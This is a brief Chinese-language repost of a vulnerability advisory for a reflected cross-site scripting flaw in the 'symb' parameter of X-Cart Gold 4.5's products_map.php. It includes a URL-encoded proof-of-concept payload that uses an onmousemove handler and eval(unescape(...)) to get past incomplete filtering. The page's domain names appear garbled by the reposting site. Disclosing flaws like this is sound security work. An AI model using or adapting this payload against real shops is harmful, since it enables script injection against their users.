标题: X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability 作者 muts 影响版本: X-Cart Gold 4.5 开发者地址: http://HdhCmsTestx-cart测试数据/ 概要: X-Cart Gold implements a degree of XSS filtering but it is incomplete. The "symb" parameter of "products_map.php" is vulnerable to XSS and can be bypassed by using HTML anchor methods and URL encoding. 测试方法 http:// HdhCmsTest2cto测试数据 / xcart/products_map?symb=%22%20onmousemove=javascript:eval%28unescape%28%26quot%3balert%28%22xss%22%29%3B%26quot%3B%29%29%3EAAAAAA
查看更多关于X-Cart Gold 4.5 (products_map.php symb parameter)的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11714